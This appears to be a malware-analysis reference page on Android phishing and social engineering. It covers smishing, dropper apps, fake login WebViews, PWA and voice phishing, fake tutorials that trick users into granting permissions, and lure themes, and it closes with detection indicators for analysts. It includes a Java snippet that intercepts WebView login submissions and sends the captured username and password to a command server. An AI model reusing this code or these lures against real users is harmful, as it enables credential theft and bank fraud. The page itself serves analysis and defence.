Phishing & Social Engineering¶
Tricking Android users into installing malware, surrendering credentials, or granting dangerous permissions. Unlike technical exploits that target software flaws, phishing targets human trust. On Android, the attack surface is broader than on desktop: SMS messages, push notifications, phone calls, QR codes, and sideloaded APKs all serve as delivery mechanisms.
See also: Call Interception, Notification Suppression, Overlay Attacks
Requirements
| Requirement | Details |
|---|---|
| Permission | Varies by technique: SEND_SMS for smishing propagation, SYSTEM_ALERT_WINDOW or BIND_ACCESSIBILITY_SERVICE for overlay phishing |
| Trigger | User interaction (tapping link, installing APK, granting permission) |
| Payload | Phishing page (HTML/WebView), fake tutorial overlay, or social engineering script |
Delivery Vectors¶
| Vector | Description | Reach | Example Families |
|---|---|---|---|
| Smishing (SMS) | Bulk SMS with malicious links, often spoofing sender ID | Mass | FluBot, Mamont, MoqHao |
| Play Store dropper | Benign app passes review, downloads malicious payload post-install | High trust | Anatsa, Joker, Harly |
| Fake APK sites | Cloned Play Store pages or standalone download sites hosting trojanized APKs | Targeted | GodFather, SpyNote |
| QR code phishing | Physical or digital QR codes leading to malicious download or credential page | In-person | Anatsa variants |
| Malvertising | Ad networks serving redirects to phishing or APK download pages | Mass | Vultur, Brokewell |
| Messaging apps | Malicious links spread through WhatsApp, Telegram, or other messengers | Social graph | FluBot, GriftHorse |
Smishing in Detail¶
SMS phishing remains the dominant initial access vector. The attacker sends a text containing a shortened URL or a domain visually similar to a trusted brand. On Android, the SMS app renders URLs as tappable links with no reputation check by default.
FluBot weaponized this into a self-propagating worm: after infecting a device, it read the victim's contact list via READ_CONTACTS and SEND_SMS, then sent smishing messages to every contact. At its peak in 2021, FluBot generated millions of SMS messages per day across Europe.
Play Store Droppers¶
The dropper pattern: a clean app (typically a PDF reader, QR scanner, or file manager) passes Google Play Protect review. After installation, it either downloads a second-stage APK from C2 or uses DexClassLoader to load a malicious DEX payload. Anatsa used this extensively throughout 2023-2024, with individual dropper apps reaching 100,000+ installs before removal.
Credential Capture Techniques¶
WebView-Based Fake Login Pages¶
The malware loads an attacker-controlled HTML page inside a WebView. The page mimics a banking app's login screen. Credentials entered into the form are captured via JavaScript interface or intercepted via shouldOverrideUrlLoading().
WebView Credential Interception
webView.setWebViewClient(new WebViewClient() {
@Override
public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
String url = request.getUrl().toString();
if (url.contains("login_submit")) {
Uri uri = request.getUrl();
String user = uri.getQueryParameter("username");
String pass = uri.getQueryParameter("password");
exfilToC2(user, pass);
return true;
}
return false;
}
});
Overlay-Based Credential Capture¶
A fake UI drawn on top of the real banking app. Triggered when the target app reaches the foreground. Covered in depth in Overlay Attacks.
Progressive Web App (PWA) Phishing¶
PWAs bypass sideloading warnings entirely
The phishing page prompts the victim to "install" a Progressive Web App. The PWA is added to the home screen with a convincing icon and name (e.g., the victim's bank). When opened, it displays a full-screen credential harvesting form. PWAs install through the browser, so none of the standard APK sideloading protections apply. This technique was observed targeting Czech and Hungarian banking customers in 2024.
Voice-Based Attacks¶
Fake Call Interception¶
Fakecalls intercepts outgoing calls to real bank phone numbers. When the victim dials their bank, Fakecalls cancels the real call and plays a pre-recorded IVR (Interactive Voice Response) that sounds identical to the bank's phone system. The fake IVR prompts the victim to enter card details via the keypad, which the malware captures.
This requires CALL_PHONE, READ_PHONE_STATE, and the ability to detect outgoing calls. Targets Korean financial institutions.
VoIP-Routed Vishing¶
LetsCAll malware routes all calls through attacker-controlled VoIP infrastructure. The victim believes they are speaking with their bank, but the call is handled by a human operator working for the attacker. This combines technical interception with live social engineering, making it harder to detect than pre-recorded approaches.
Push Notification Phishing¶
Malware with BIND_NOTIFICATION_LISTENER_SERVICE can both read and generate push notifications. Attack pattern:
- Generate a fake push notification mimicking the victim's bank ("Suspicious transaction detected -- verify now")
- Notification tap opens a WebView credential harvesting page
- Simultaneously suppress real banking notifications to avoid contradicting the fake alert
This is effective because users inherently trust push notifications from installed apps. TrickMo and GodFather both use this technique.
Social Engineering for Permission Grants¶
Obtaining dangerous permissions (Accessibility, Device Admin, Notification Listener) requires convincing the victim to manually toggle settings. Common strategies:
| Technique | Implementation | Target Permission |
|---|---|---|
| Fake tutorial overlay | Step-by-step instructions drawn over Settings app | Accessibility |
| "Security update required" | Dialog claiming the OS needs an accessibility update | Accessibility |
| "Battery optimization" | Claims the app needs accessibility for battery management | Accessibility |
| "Enable notifications" | Tells user to enable notification access for "full functionality" | Notification Listener |
| "Device protection" | Prompts user to activate device admin for "anti-theft" | Device Admin |
| "Accessibility for disabled" | Poses as an assistive app that genuinely needs the permission | Accessibility |
Origin of the fake tutorial technique
Cerberus popularized the fake tutorial overlay -- it literally draws arrows and text boxes on top of the Settings screen, guiding the victim through each toggle. Most modern banking trojans have adopted variations of this technique.
Lure Themes by Region¶
| Theme | Regions | Example Families |
|---|---|---|
| Package delivery ("Your parcel is held") | Europe, Japan, Australia | FluBot, MoqHao |
| Bank security alert | Global | GodFather, Cerberus, Anubis |
| Tax refund / government notice | US, UK, Germany, Japan | Hydra variants |
| Crypto airdrop / wallet verification | Global | SpyAgent, SparkCat |
| Voicemail notification | Europe, US | FluBot |
| Chrome / browser update | Global | Hook, Brokewell, Vultur |
| Flash Player update | Legacy (pre-2021) | Anubis, Cerberus |
| Video player / media codec | LATAM, Southeast Asia | Gigabud, GoldPickaxe |
| Government ID / MyGov | India, Thailand, Vietnam | GoldPickaxe |
| Subscription fraud lure | Global (Play Store) | Joker, Harly |
Geographic targeting goes beyond translation. Regional campaigns match local carriers, banks, postal services, and government agencies. GodFather maintains localized phishing pages for banks across 16+ countries, dynamically selecting the inject based on device locale and installed banking apps.
Families Using This Technique¶
| Family | Primary Vector | Lure | Scale |
|---|---|---|---|
| FluBot | SMS worm | Package delivery / voicemail | Millions of SMS/day at peak |
| Fakecalls | Fake APK site | Banking app clone | Targeted (Korea) |
| Mamont | SMS | Delivery tracking | Russia-focused |
| GodFather | Fake APK site + dropper | Banking / crypto | 400+ targets, 16+ countries |
| Anatsa | Play Store dropper | PDF reader / cleaner | 100K+ installs per dropper |
| Hook | Malvertising | Chrome update | 400+ targets |
| Joker | Play Store dropper | Utility apps | Thousands of dropper apps |
| GriftHorse | Play Store + messenger | Prize / reward | 10M+ victims |
| MoqHao | SMS | Package delivery | Japan, South Korea |
| SpyNote | Fake APK site | Utility / banking | Targeted campaigns |
Common Phishing Flow¶
Typical end-to-end attack chain:
- Delivery: victim receives smishing text ("Your package could not be delivered")
- Landing page: link leads to a fake carrier site with "Download tracking app" button
- APK install: victim enables
REQUEST_INSTALL_PACKAGESfor the browser and installs the APK - Permission escalation: app shows fake tutorial to enable Accessibility
- Overlay injection: malware detects banking app launch, shows overlay to capture credentials
- 2FA interception: accessibility or SMS permissions used to intercept OTP
- Account takeover: credentials + OTP sent to C2, attacker logs in from their device
Analyst Note
Each step relies on social engineering rather than technical exploitation. The weakest link is always the initial tap on a link in a text message. When analyzing a sample, trace the full chain from delivery vector through permission escalation to understand the complete attack flow.
Detection During Analysis¶
Static Indicators
- HTML files mimicking banking login pages in assets or downloaded to internal storage
- Hardcoded SMS message templates with URL placeholders
BroadcastReceiverforSMS_RECEIVEDorWAP_PUSH_RECEIVEDTelephonyManagerorCallScreeningServiceusage for call interception- Localized string resources matching phishing lure themes
Dynamic Indicators
- Outbound SMS to numbers not in contacts (worm propagation)
- WebView loading credential-harvesting URLs
- Fake notifications generated matching banking app package names
- Calls intercepted and rerouted through VoIP endpoints